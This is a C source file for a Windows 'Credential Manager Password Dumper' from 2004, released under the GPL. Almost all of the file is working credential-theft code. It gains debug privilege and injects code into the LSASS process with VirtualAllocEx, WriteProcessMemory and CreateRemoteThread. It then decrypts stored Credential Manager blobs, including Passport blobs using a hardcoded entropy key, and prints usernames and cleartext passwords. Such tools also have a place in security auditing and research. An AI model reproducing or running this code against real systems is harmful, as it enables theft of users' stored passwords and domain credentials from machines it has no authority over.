/*
Copyright 2004 Massimiliano Montoro (mao@oxid.it)

This program is free software; you can redistribute it and/or modify it
under the terms of the GNU General Public License Version 2, as published
by the Free Software Foundation.

This program is distributed in the hope that it will be useful, but WITHOUT
ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
FITNESS FOR A PARTICULAR PURPOSE.  The program may contain errors that
could cause failures or loss of data, and may be incomplete or contain
inaccuracies.  By using the program, you expressly acknowledge and agree
that use of the program, or any portion thereof, is at your sole and entire
risk.  You are solely responsible for determining the appropriateness of
using, copying, distributing and modifying the program and assume all risks
of exercising your rights under the license, compliance with all applicable
laws, damage to or loss of data, programs or equipment, and unavailability
or interruption of operations.   THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES
EXPRESSLY DISCLAIM ALL WARRANTIES AND/OR CONDITIONS, EXPRESS OR IMPLIED,
INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES AND/OR CONDITIONS OF
MERCHANTABILITY, OF SATISFACTORY QUALITY, OF FITNESS FOR A PARTICULAR
PURPOSE, OF ACCURACY, OF QUIET ENJOYMENT, AND NONINFRINGEMENT OF THIRD
PARTY RIGHTS.  THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES DO NOT WARRANT
AGAINST INTERFERENCE WITH YOUR ENJOYMENT OF THE PROGRAM, THAT THE FUNCTIONS
CONTAINED IN THE PROGRAM WILL MEET YOUR NEEDS, THAT THE OPERATION OF THE
PROGRAM WILL BE UNINTERRUPTED OR ERROR-FREE, OR THAT DEFECTS IN THE PROGRAM
WILL BE CORRECTED. THE DISCLAIMER OF WARRANTY CONSTITUTES AN ESSENTIAL PART
OF THE LICENSE TO USE THE PROGRAM AND NO USE OF THE PROGRAM IS AUTHORIZED
EXCEPT UNDER THE DISCLAIMER.  ALSO, SOME JURISDICTIONS DO NOT ALLOW THE
EXCLUSION OR LIMITATION OF INCIDENTAL OR CONSEQUENTIAL DAMAGES, SO THAT
EXCLUSION AND LIMITATION MAY NOT APPLY TO YOU.  See the GNU General Public
License Version 2 for more details.

You should have received a copy of the GNU General Public License Version 2
along with this program; if not, write to the Free Software Foundation, 59
Temple Place, Suite 330, Boston, MA 02111-1307 USA.

*/

#include "windows.h"
#include "stdio.h"
#include "shlwapi.h"
#include "inject.h"

#define _WIN32_WINNT 0x0500
#include "wincrypt.h"

typedef struct _CRYPTOAPI_BLOB {
  DWORD cbData;
  BYTE* pbData;
} DATA_BLOB;

typedef struct _CRYPTPROTECT_PROMPTSTRUCT {  
	DWORD cbSize;  
	DWORD dwPromptFlags;  
	HWND hwndApp;  
	LPCWSTR szPrompt;
} CRYPTPROTECT_PROMPTSTRUCT, *PCRYPTPROTECT_PROMPTSTRUCT;

typedef BOOL (WINAPI *CryptUnprotectData) (
  DATA_BLOB* pDataIn,
  LPWSTR* ppszDataDescr,
  DATA_BLOB* pOptionalEntropy,
  PVOID pvReserved,
  CRYPTPROTECT_PROMPTSTRUCT* pPromptStruct,
  DWORD dwFlags,
  DATA_BLOB* pDataOut
);

#define CRYPTPROTECT_UI_FORBIDDEN				0x1
#define CRED_MAX_GENERIC_TARGET_NAME_LENGTH		32767

struct LSACREDINFO
{
	DWORD CredLen;
	DWORD Flags;
	DWORD Type;
	FILETIME LastModified;
	unsigned char unknown[20];
};

BOOL GetAppDataPath(char* value, char *path)
{
	HKEY hKey = NULL;
	CHAR sApp[MAX_PATH];
	DWORD dwApp = MAX_PATH;
	
	if (RegOpenKey(HKEY_CURRENT_USER, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders", &hKey) || !hKey){
		return FALSE;
	}
	if (RegQueryValueEx(hKey,value,NULL,NULL,(PBYTE) &sApp,&dwApp)) 
	{
		RegCloseKey(hKey);
		return FALSE;
	}
	RegCloseKey(hKey);
	strcpy(path,sApp);
	return TRUE;
}

BOOL AssignCurrentTokenToThread(PHANDLE phThread)
{
	BOOL ret;
	HANDLE hToken = NULL;
	HANDLE hDupToken = NULL;
	
	if (!OpenProcessToken(GetCurrentProcess(),TOKEN_DUPLICATE|TOKEN_IMPERSONATE|TOKEN_QUERY, &hToken)) 
		return FALSE;

	if (!DuplicateToken(hToken, SecurityImpersonation, &hDupToken))
	{
		CloseHandle (hToken);
		return FALSE;
	}

	ret = SetThreadToken(phThread,hDupToken);

	CloseHandle (hToken);
	CloseHandle (hDupToken);
	return ret;
}

BOOL InjectCredentialManagerCode(HANDLE hProc, LPTSTR inputFilePath, LPTSTR outputFilePath)
{
	DWORD dwFuncSize;
	DWORD dwBytesToAlloc;
	void* pRemoteAlloc = NULL;
	RemoteThreadData rtData;
	HINSTANCE hKernel32;
	DWORD dwBytesWritten;
	HANDLE hRemoteThread = 0;
	DWORD trc = 3;
	DWORD dwIgnored;
	BOOL Done = FALSE;

	hKernel32 = LoadLibrary("Kernel32");
	if (hKernel32==NULL)
	{
		printf("Couldn't load Kernel32 DLL\n");
		return FALSE;
	}

	rtData.pLoadLibrary=(pLoadLibFunc)GetProcAddress(hKernel32,"LoadLibraryA");
	rtData.pGetProcAddress=(pGetProcAddrFunc)GetProcAddress(hKernel32,"GetProcAddress");
	rtData.pFreeLibrary=(pFreeLibFunc)GetProcAddress(hKernel32,"FreeLibrary");

	char currPath[MAX_PATH];
	GetModuleFileName(NULL,currPath,sizeof(currPath));
	PathRemoveFileSpec(currPath);

	strncpy(rtData.szDllName, currPath, sizeof(rtData.szDllName)); 
	strcat (rtData.szDllName,"\\creddump.dll");

	strncpy(rtData.szOutputFileName, currPath, sizeof(rtData.szOutputFileName)); 
	strcat (rtData.szOutputFileName,"\\cred.txt");

	strncpy(rtData.szInputFileName, inputFilePath, sizeof(rtData.szInputFileName));
	strncpy(rtData.szFuncName, "DumpCF", sizeof(rtData.szFuncName) );

	strcpy(outputFilePath, rtData.szOutputFileName);

	dwFuncSize = (DWORD)DummyFuncForSize - (DWORD)RemoteThreadFunc;
	dwBytesToAlloc = dwFuncSize + sizeof(RemoteThreadData) + 4;

	pRemoteAlloc = VirtualAllocEx(hProc,NULL,dwBytesToAlloc,MEM_COMMIT,PAGE_READWRITE);
	if( pRemoteAlloc == NULL ) {
		printf("VirtualAllocEx failed: %d\n", GetLastError());
		return FALSE;
	}

	if( !WriteProcessMemory(hProc,pRemoteAlloc,&rtData,sizeof(rtData),&dwBytesWritten)){
		printf("WriteProcessMemory failed: %d\n", GetLastError());
		goto exit;
	}

	if( !WriteProcessMemory(hProc,(PBYTE)pRemoteAlloc+sizeof(RemoteThreadData)+4,
							 (LPVOID)(DWORD)RemoteThreadFunc, dwFuncSize, &dwBytesWritten)){
		printf("WriteProcessMemory failed: %d\n", GetLastError());
		goto exit;
	}

	hRemoteThread = CreateRemoteThread(	hProc,
										NULL,
										0,
										(LPTHREAD_START_ROUTINE)((PBYTE)pRemoteAlloc + sizeof(RemoteThreadData) + 4),
										pRemoteAlloc,
										CREATE_SUSPENDED,
										&dwIgnored );
	if(!hRemoteThread){
		printf("CreateRemoteThread failed: %d\n", GetLastError());
		goto exit;
	}
	
	if (!AssignCurrentTokenToThread(&hRemoteThread))
	{
		printf("Couldn't set remote thread token: %d\n", GetLastError());
		goto exit;
	}

	if (ResumeThread(hRemoteThread) == -1)
	{
		printf("Couldn't resume remote thread: %d\n", GetLastError());
		goto exit;
	}

	WaitForSingleObject( hRemoteThread, INFINITE );
	GetExitCodeThread( hRemoteThread, &trc );
	if( trc == -1 ) 
		Done = FALSE;
	else 
		Done = TRUE;

exit:
	if( hRemoteThread ) CloseHandle( hRemoteThread );
	VirtualFreeEx( hProc, pRemoteAlloc, 0, MEM_RELEASE );
	return Done;
}

BOOL GetTextualSid(PSID pSid, LPTSTR TextualSid, LPDWORD lpdwBufferLen)
{
	PSID_IDENTIFIER_AUTHORITY psia;
    DWORD dwSubAuthorities;
    DWORD dwSidRev=SID_REVISION;
    DWORD dwCounter;
    DWORD dwSidSize;

    if(!IsValidSid(pSid)) return FALSE;
    psia = GetSidIdentifierAuthority(pSid);
    dwSubAuthorities = *GetSidSubAuthorityCount(pSid);
    dwSidSize=(15 + 12 + (12 * dwSubAuthorities) + 1) * sizeof(TCHAR);
    if (*lpdwBufferLen < dwSidSize){
        *lpdwBufferLen = dwSidSize;
        SetLastError(ERROR_INSUFFICIENT_BUFFER);
        return FALSE;
    }
    dwSidSize=wsprintf(TextualSid, TEXT("S-%lu-"), dwSidRev );
    if ( (psia->Value[0] != 0) || (psia->Value[1] != 0) ){
        dwSidSize+=wsprintf(TextualSid + lstrlen(TextualSid),
                    TEXT("0x%02hx%02hx%02hx%02hx%02hx%02hx"),
                    (USHORT)psia->Value[0],
                    (USHORT)psia->Value[1],
                    (USHORT)psia->Value[2],
                    (USHORT)psia->Value[3],
                    (USHORT)psia->Value[4],
                    (USHORT)psia->Value[5]);
    }
    else{
        dwSidSize+=wsprintf(TextualSid + lstrlen(TextualSid),
                    TEXT("%lu"),
                    (ULONG)(psia->Value[5]      )   +
                    (ULONG)(psia->Value[4] <<  8)   +
                    (ULONG)(psia->Value[3] << 16)   +
                    (ULONG)(psia->Value[2] << 24)   );
    }
    for (dwCounter=0 ; dwCounter < dwSubAuthorities ; dwCounter++) {
        dwSidSize+=wsprintf(TextualSid + dwSidSize, TEXT("-%lu"),
                    *GetSidSubAuthority(pSid, dwCounter) );
    }
    return TRUE;
}

BOOL BLOB_Decode_Passport(PVOID pInput, PVOID pOutput)
{
	BOOL ret = FALSE; 

	static unsigned char entropyData[] = {
	0xe0, 0x00, 0xc8, 0x00, 0x08, 0x01, 0x10, 0x01,
	0xc0, 0x00, 0x14, 0x01, 0xd8, 0x00, 0xdc, 0x00,
	0xb4, 0x00, 0xe4, 0x00, 0x18, 0x01, 0x14, 0x01,
	0x04, 0x01, 0xb4, 0x00, 0xd0, 0x00, 0xdc, 0x00,
	0xd0, 0x00, 0xe0, 0x00, 0xb4, 0x00, 0xe0, 0x00,
	0xd8, 0x00, 0xdc, 0x00, 0xc8, 0x00, 0xb4, 0x00,
	0x10, 0x01, 0xd4, 0x00, 0x14, 0x01, 0x18, 0x01,
	0x14, 0x01, 0xd4, 0x00, 0x08, 0x01, 0xdc, 0x00,
	0xdc, 0x00, 0xe4, 0x00, 0x08, 0x01, 0xc0, 0x00, 
	0x00, 0x00 };

	DATA_BLOB entropy = { sizeof(entropyData), entropyData };
	CryptUnprotectData pCryptUnprotectData;
	
	pCryptUnprotectData = (BOOL (WINAPI *) (DATA_BLOB*,LPWSTR*,DATA_BLOB*,PVOID,CRYPTPROTECT_PROMPTSTRUCT*,DWORD,DATA_BLOB*)) GetProcAddress( LoadLibrary( "crypt32.dll"),"CryptUnprotectData" );
	if( !pCryptUnprotectData ) return FALSE;

	ret = pCryptUnprotectData((DATA_BLOB*) pInput, NULL, &entropy, NULL, NULL, CRYPTPROTECT_UI_FORBIDDEN, (DATA_BLOB*) pOutput);

	return ret;
}

BOOL BLOB_Decode_Simple(PVOID pInput, PVOID pOutput)
{
	BOOL ret = FALSE; 

	CryptUnprotectData pCryptUnprotectData;
	
	pCryptUnprotectData = (BOOL (WINAPI *) (DATA_BLOB*,LPWSTR*,DATA_BLOB*,PVOID,CRYPTPROTECT_PROMPTSTRUCT*,DWORD,DATA_BLOB*)) GetProcAddress( LoadLibrary( "crypt32.dll"),"CryptUnprotectData" );
	if( !pCryptUnprotectData ) return FALSE;

	ret = pCryptUnprotectData((DATA_BLOB*) pInput, NULL, NULL, NULL, NULL, CRYPTPROTECT_UI_FORBIDDEN, (DATA_BLOB*) pOutput);

	return ret;
}

int Decode_Blob(unsigned char *pBlobData, int BlobSize, char* decoded, int decoded_buffersize)
{
	BOOL isUnicode;
	DATA_BLOB data;
	DATA_BLOB pass;
	data.pbData = pBlobData;
	data.cbData = BlobSize;

	memset (decoded,0,decoded_buffersize);

	// Check if the blob is a Passport BLOB
	if (BLOB_Decode_Passport(&data, &pass)==TRUE)
	{
		WideCharToMultiByte (CP_ACP,0,(WCHAR*) pass.pbData, pass.cbData*2, decoded,decoded_buffersize,NULL,NULL);
		return 1;
	}
	
	// Check if the blob is a BLOB from CryptProtectData with no entropy
	if (BLOB_Decode_Simple(&data, &pass)==TRUE)
	{
		isUnicode = IsTextUnicode (pass.pbData, pass.cbData, NULL);
		if (isUnicode == TRUE)
		{
			WideCharToMultiByte (CP_ACP,0,(LPWSTR) pass.pbData, pass.cbData/2, decoded,decoded_buffersize,NULL,NULL);
		}
		else 
		{
			strncpy (decoded, (char*) pass.pbData, pass.cbData);
		}
		return 2;
	}

	// Check if the BLOB is an UNICODE or a MultiByte password
	isUnicode = IsTextUnicode (pBlobData, BlobSize ,NULL);
	if (isUnicode == TRUE)
	{
		WideCharToMultiByte (CP_ACP,0,(LPWSTR) pBlobData, BlobSize/2, decoded,decoded_buffersize,NULL,NULL);
	}
	else 
	{
		strncpy (decoded, (char*) pBlobData, BlobSize);
	}

	return 0;
}


void DumpCredentials(LPTSTR CredentialFile, BOOL IsLocal)
{
	DWORD dwPid = 0;
	HANDLE hLsassProc = NULL;
	char outputFilePath[MAX_PATH];
	FILE* credfile = NULL;
	int dwSize = 0;
	int start=0;
	int BlobType;
	SYSTEMTIME stUTC, stLocal;
	unsigned char* pCred;
	unsigned char* pOffset;

	DWORD TargetLen, UserLen, BlobLen, CommentLen, AliasLen;
	char* temp = (char*) calloc (CRED_MAX_GENERIC_TARGET_NAME_LENGTH, sizeof(char));

	memset (outputFilePath,0,sizeof(outputFilePath));

	if(EnableDebugPriv()!=0) return;

	dwPid = GetLsassPid();
	if(!dwPid ) return;
	hLsassProc = OpenProcess( PROCESS_ALL_ACCESS, FALSE, dwPid );
	if(hLsassProc==0) 
	{
		printf ("Couldn't open LSASS process\n");
		return;
	}
	if (!InjectCredentialManagerCode(hLsassProc, CredentialFile, outputFilePath)) return;
	if (hLsassProc!=NULL) CloseHandle (hLsassProc);

	credfile = fopen (outputFilePath,"rb");
	if (credfile == NULL) 
	{
		printf ("Couldn't open %s\n", outputFilePath);
		return;
	}

	fseek(credfile, 0, SEEK_END);
	dwSize = ftell(credfile);
	fseek(credfile, 0, SEEK_SET);

	unsigned char* buffer = (unsigned char*) calloc (dwSize, sizeof (unsigned char));

	fread (buffer, dwSize, 1, credfile);
	fclose (credfile);

	if (IsLocal == TRUE) start = 0xa2;
	else start = 0xac;

	for (pCred = (unsigned char*) &buffer[start]; pCred<buffer+dwSize; )
	{
		pOffset = pCred;
		LSACREDINFO* pCredInfo = (LSACREDINFO*) pOffset;
		if (pCredInfo->CredLen == 0x08080808) break;

		pOffset += sizeof (LSACREDINFO);
		TargetLen = *(DWORD*) (pOffset); pOffset += sizeof (DWORD);
		memset (temp,0,CRED_MAX_GENERIC_TARGET_NAME_LENGTH);
		WideCharToMultiByte (CP_ACP,0,(LPWSTR) pOffset,TargetLen/2,temp,CRED_MAX_GENERIC_TARGET_NAME_LENGTH,NULL,NULL);
		printf ("Target: %s\n",temp);

		pOffset += TargetLen;
		CommentLen = *(DWORD*) (pOffset); pOffset += sizeof (DWORD);
		memset (temp,0,CRED_MAX_GENERIC_TARGET_NAME_LENGTH);
		WideCharToMultiByte (CP_ACP,0,(LPWSTR) pOffset,CommentLen/2,temp,CRED_MAX_GENERIC_TARGET_NAME_LENGTH,NULL,NULL);
		printf ("Comment: %s\n",temp);

		pOffset += CommentLen;	
		AliasLen = *(DWORD*) (pOffset); pOffset += sizeof (DWORD);
		memset (temp,0,CRED_MAX_GENERIC_TARGET_NAME_LENGTH);
		WideCharToMultiByte (CP_ACP,0,(LPWSTR) pOffset,AliasLen/2,temp,CRED_MAX_GENERIC_TARGET_NAME_LENGTH,NULL,NULL);
		printf ("Alias: %s\n",temp);

		printf ("Flags: 0x%.8x\n", pCredInfo->Flags);
		FileTimeToSystemTime(&pCredInfo->LastModified, &stUTC);
		SystemTimeToTzSpecificLocalTime (NULL, &stUTC, &stLocal);
		printf("Last Modified: %02d/%02d/%d - %02d:%02d:%02d\n",stLocal.wMonth,stLocal.wDay,stLocal.wYear,stLocal.wHour,stLocal.wMinute,stLocal.wSecond);


		pOffset += AliasLen;
		UserLen = *(DWORD*) (pOffset); pOffset += sizeof (DWORD);
		memset (temp,0,CRED_MAX_GENERIC_TARGET_NAME_LENGTH);
		WideCharToMultiByte (CP_ACP,0,(LPWSTR) pOffset,UserLen/2,temp,CRED_MAX_GENERIC_TARGET_NAME_LENGTH,NULL,NULL);
		printf ("Username: %s\n",temp);

		pOffset += UserLen;

		BlobLen = *(DWORD*) (pOffset); pOffset += sizeof (DWORD);

		switch (pCredInfo->Type)
		{
		case 1:	BlobType = Decode_Blob(pOffset, BlobLen, temp, CRED_MAX_GENERIC_TARGET_NAME_LENGTH);
				printf ("Password: %s\n",temp);
				if (BlobType==2) printf("Type: Generic (BLOB)\n");
				else printf ("Type: Generic\n");
				break;

		case 2:	BlobType = Decode_Blob(pOffset, BlobLen, temp, CRED_MAX_GENERIC_TARGET_NAME_LENGTH);
				printf ("Password: %s\n",temp);
				if (BlobType==2) printf ("Type: Domain Password (BLOB)\n");
				else printf ("Type: Domain Password\n");
				break;

		case 3:	printf ("Password:\n");
				printf ("Type: Certificate\n");
				break;

		case 4:	BlobType = Decode_Blob(pOffset, BlobLen, temp, CRED_MAX_GENERIC_TARGET_NAME_LENGTH);
				printf ("Password: %s\n",temp);
				if (BlobType==1) printf ("Type: Passport (BLOB)\n");
				else if (BlobType==2) printf ("Type: Visible Password (BLOB)\n");
				else printf ("Type: Visible Password\n");
				break;

		default:BlobType = Decode_Blob(pOffset, BlobLen, temp, CRED_MAX_GENERIC_TARGET_NAME_LENGTH);
				printf ("Password: %s\n",temp);
				if (BlobType==2) printf ("Type: Unknown (BLOB)\n");
				else printf ("Type: Unknown\n");
				break;
		} 
		
		pCred += pCredInfo->CredLen;

		if (IsLocal)
			printf ("Credential Set: Local\n\n");
		else		
			printf ("Credential Set: Enterprise\n\n");
	}

	if (strcmp(outputFilePath,"")!=0) DeleteFile(outputFilePath);

	free (temp);
	free (buffer);
}

void GetCredentials()
{
	SID* pSid;
	DWORD cbSid;
	SID_NAME_USE peUse;
	char* domain;
	DWORD domainsize;
	TCHAR szTextualSid[256]; 
	DWORD cchSid=256;
	char username[256];
	DWORD size = sizeof(username);
	char CredentialFilePath[MAX_PATH];
	char appdatapath[MAX_PATH];
	DWORD error;
	
	if (!GetUserName(username,&size))
	{
		printf("Couldn't get current username\n");
		return;
	}
	
	pSid = 0;
	cbSid = 0;
	domain = 0;
	domainsize = 0;

	LookupAccountName(NULL, username, pSid, &cbSid, domain, &domainsize, &peUse);
	error = GetLastError();
	if (error != ERROR_INSUFFICIENT_BUFFER)
	{
		printf("Couldn't get account SID\n");
		return;
	}

	pSid = (SID*) HeapAlloc(GetProcessHeap(), 0, cbSid);
	if (!pSid) 
	{
		printf("Couldn't allocate heap memory for SID\n");
		return;
	}

	domain = (char *) HeapAlloc(GetProcessHeap(), 0, domainsize);
	if (!domain)
	{
		printf("Couldn't allocate heap memory for domain name\n");
		HeapFree(GetProcessHeap(), 0, pSid);
		return;
	}		

	if (!LookupAccountName(NULL,  (LPCTSTR) username, pSid, &cbSid, domain, &domainsize, &peUse))
	{
		printf("Couldn't get account SID\n");
		goto exit;
	}

	if (!GetTextualSid (pSid, szTextualSid, &cchSid))
	{
		printf("Couldn't convert SID to string\n");
		goto exit;;
	}

	// Enterprise Credential Set
	if (!GetAppDataPath("AppData", appdatapath))
	{
		printf("Couldn't get AppData path\n");
		goto exit;;
	}
	sprintf (CredentialFilePath, "%s\\Microsoft\\Credentials\\%s\\credentials",appdatapath,szTextualSid);
	DumpCredentials((LPTSTR) CredentialFilePath, FALSE);


	// Local Credential Set
	if (!GetAppDataPath("Local AppData", appdatapath))
	{
		printf("Couldn't get Local AppData path\n");
		goto exit;;
	}
	sprintf (CredentialFilePath, "%s\\Microsoft\\Credentials\\%s\\credentials",appdatapath,szTextualSid);
	DumpCredentials((LPTSTR) CredentialFilePath, TRUE);

exit:

	HeapFree(GetProcessHeap(), 0, pSid);
	HeapFree(GetProcessHeap(), 0, domain);
}



int main(int argc, char* argv[])
{
	printf("\n");
	printf("Credential Manager Password Dumper\n");
	printf("Copyright 2004 Massimiliano Montoro (mao@oxid.it)\n");
	printf("-----------------------------------------------------------------------------\n");
    printf("General Public License Version 2 (GNU GPL), you can redistribute it and/or   \n" );
    printf("modify it under the terms of the GNU GPL, as published by the Free Software  \n" );
    printf("Foundation.  NO WARRANTY, EXPRESSED OR IMPLIED, IS GRANTED WITH THIS PROGRAM.\n" );
    printf("Please see the COPYING file included with this program and the GNU GPL for   \n" );
    printf("further details. The program is also available at http://www.oxid.it\n" );
	printf("-----------------------------------------------------------------------------\n");
	printf("\n");
	GetCredentials();
	return 0;
}